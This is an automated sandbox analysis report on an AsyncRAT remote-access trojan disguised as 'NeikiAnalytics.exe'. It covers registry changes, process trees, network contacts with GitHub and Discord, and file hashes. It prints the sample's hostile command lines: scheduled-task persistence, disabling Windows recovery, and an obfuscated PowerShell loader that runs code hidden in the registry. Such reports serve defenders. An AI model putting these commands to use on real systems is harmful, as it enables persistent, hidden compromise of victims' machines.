Malware Analysis Report

2024-09-22 06:33

Sample ID 240620-kmtvkasfqk
Target 4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe
SHA256 4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca
Tags
asyncrat default evasion persistence rat bootkit
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca

Threat Level: Known bad

The file 4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat default evasion persistence rat bootkit

Modifies security service

Suspicious use of NtCreateUserProcessOtherParentProcess

AsyncRat

Async RAT payload

Event Triggered Execution: Image File Execution Options Injection

Drops file in Drivers directory

Sets service image path in registry

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Checks BIOS information in registry

Writes to the Master Boot Record (MBR)

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Scheduled Task/Job: Scheduled Task

Checks SCSI registry key(s)

Uses Volume Shadow Copy service COM API

Modifies registry class

Suspicious use of UnmapMainImage

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-20 08:43

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-20 08:43

Reported

2024-06-20 08:46

Platform

win7-20240221-en

Max time kernel

149s

Max time network

21s

Command Line

winlogon.exe

Signatures

AsyncRat

rat asyncrat

Modifies security service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP C:\Windows\System32\svchost.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection C:\Windows\System32\svchost.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2276 created 436 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Roaming\server.exe N/A

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe\Debugger = "c:\\dur\\dur.durp" C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe\Debugger = "c:\\dur\\dur.durp" C:\Users\Admin\AppData\Roaming\server.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2168 set thread context of 268 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2276 set thread context of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30d7cafaedc2da01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\System32\dllhost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Roaming\server.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1096 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1096 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1096 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1096 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 2816 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2064 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 2064 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 2064 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 2064 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 2816 wrote to memory of 500 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 500 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 500 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 500 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 500 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 500 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 500 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 500 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2716 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2716 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2716 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2716 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2716 wrote to memory of 2168 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2716 wrote to memory of 2168 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2716 wrote to memory of 2168 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2716 wrote to memory of 2168 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2168 wrote to memory of 844 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2168 wrote to memory of 844 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2168 wrote to memory of 844 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2168 wrote to memory of 844 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 844 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 844 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 844 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 2168 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2168 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2168 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2168 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2168 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2168 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2168 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2168 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2168 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2168 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 1428 wrote to memory of 2276 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 1428 wrote to memory of 2276 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 1428 wrote to memory of 2276 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2276 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2276 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2276 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2276 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2276 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2276 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2276 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2276 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2276 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2260 wrote to memory of 860 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2260 wrote to memory of 860 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Roaming\server.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SysWOW64\cmd.exe

"cmd" /c reagentc.exe /disable

C:\Windows\SysWOW64\ReAgentc.exe

reagentc.exe /disable

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k swprv

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Users\Admin\AppData\Roaming\server.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp46A1.tmp.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Users\Admin\AppData\Roaming\server.exe"'

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\server.exe

"C:\Users\Admin\AppData\Roaming\server.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c reagentc.exe /disable

C:\Windows\SysWOW64\ReAgentc.exe

reagentc.exe /disable

C:\Users\Admin\AppData\Roaming\server.exe

"C:\Users\Admin\AppData\Roaming\server.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {B2234D1A-A5DD-4061-BE54-5722920A8F52} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+''+'A'+'R'+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{a24d2027-8780-47c1-99ad-f5b58c783085}

C:\Users\Admin\AppData\Roaming\server.exe

"C:\Users\Admin\AppData\Roaming\server.exe"

C:\Windows\SysWOW64\REG.exe

"REG" QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp

Files

memory/1096-0-0x000007FEF5CD3000-0x000007FEF5CD4000-memory.dmp

memory/1096-1-0x000000013F090000-0x000000013F104000-memory.dmp

memory/1096-2-0x0000000000660000-0x00000000006AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\server.exe

MD5 888ff5f8b060ce5be6249e2529a6a9ec
SHA1 f2a2facd8e9f5d000102a90cd487a99c3acf5c42
SHA256 5fc41380ed9f0400d4ffd34d0ef12099d88210904fe2f539acc7c16391da8f66
SHA512 8590feb0ecbae8d408addc37a177eabcfb338e193cf34b81310a1b67f56be0de4850c5269e26bdc8670a109aa21c3560cad0571c9a4867871a88f53978e5b598

memory/2816-10-0x0000000074B1E000-0x0000000074B1F000-memory.dmp

memory/2816-11-0x0000000000920000-0x000000000096C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp46A1.tmp.bat

MD5 e11b0161c72298da16da56b08b348396
SHA1 02fe6b18a525e6e1e02e7ce5984c0076b75b7c5b
SHA256 9c94cc402025dd09be7eaab73a4ea73a5f3b9d847cd24db9605ce0fe4610539d
SHA512 fd47df3e6bf0c52b826683b7c749862fe5fe776f045d1e299e06fea7db86fd6bca6c5f9f00d0c41d54b3ccd37c2d2a3ee51974fcbe7d9cea706aa57d27da9a14

memory/2168-24-0x0000000000980000-0x00000000009CC000-memory.dmp

memory/2168-25-0x0000000000B60000-0x0000000000B89000-memory.dmp

memory/268-26-0x0000000000400000-0x000000000042B000-memory.dmp

memory/268-37-0x0000000000400000-0x000000000042B000-memory.dmp

memory/268-36-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/268-34-0x0000000000400000-0x000000000042B000-memory.dmp

memory/268-32-0x0000000000400000-0x000000000042B000-memory.dmp

memory/268-30-0x0000000000400000-0x000000000042B000-memory.dmp

memory/268-28-0x0000000000400000-0x000000000042B000-memory.dmp

memory/268-40-0x0000000000400000-0x000000000042B000-memory.dmp

memory/2276-41-0x0000000019F40000-0x000000001A222000-memory.dmp

memory/2276-42-0x0000000001270000-0x0000000001278000-memory.dmp

memory/2276-43-0x0000000001400000-0x000000000142A000-memory.dmp

memory/2276-45-0x00000000777F0000-0x000000007790F000-memory.dmp

memory/2276-44-0x0000000077910000-0x0000000077AB9000-memory.dmp

memory/2260-53-0x00000000777F0000-0x000000007790F000-memory.dmp

memory/2260-54-0x0000000140000000-0x0000000140008000-memory.dmp

memory/436-61-0x0000000000BA0000-0x0000000000BCB000-memory.dmp

memory/436-60-0x0000000000B70000-0x0000000000B95000-memory.dmp

memory/436-58-0x0000000000B70000-0x0000000000B95000-memory.dmp

memory/480-86-0x0000000037950000-0x0000000037960000-memory.dmp

memory/496-92-0x0000000000220000-0x000000000024B000-memory.dmp

memory/480-85-0x000007FEBDE30000-0x000007FEBDE40000-memory.dmp

memory/480-84-0x0000000000210000-0x000000000023B000-memory.dmp

memory/480-78-0x0000000000210000-0x000000000023B000-memory.dmp

memory/436-72-0x0000000037950000-0x0000000037960000-memory.dmp

memory/436-71-0x000007FEBDE30000-0x000007FEBDE40000-memory.dmp

memory/436-70-0x0000000000BA0000-0x0000000000BCB000-memory.dmp

memory/436-64-0x0000000000BA0000-0x0000000000BCB000-memory.dmp

memory/2260-52-0x0000000077910000-0x0000000077AB9000-memory.dmp

memory/2260-51-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2260-49-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2260-48-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2260-47-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2260-46-0x0000000140000000-0x0000000140008000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-20 08:43

Reported

2024-06-20 08:46

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

147s

Command Line

winlogon.exe

Signatures

AsyncRat

rat asyncrat

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3992 created 616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 2888 created 616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Roaming\server.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe N/A

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe\Debugger = "c:\\dur\\dur.durp" C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe\Debugger = "c:\\dur\\dur.durp" C:\Users\Admin\AppData\Roaming\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe\Debugger = "c:\\dur\\dur.durp" C:\Users\Admin\AppData\Roaming\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe\Debugger = "c:\\dur\\dur.durp" C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" C:\Windows\System32\WaaSMedicAgent.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\Recovery\ReAgent.xml C:\Windows\SysWOW64\ReAgentc.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe N/A
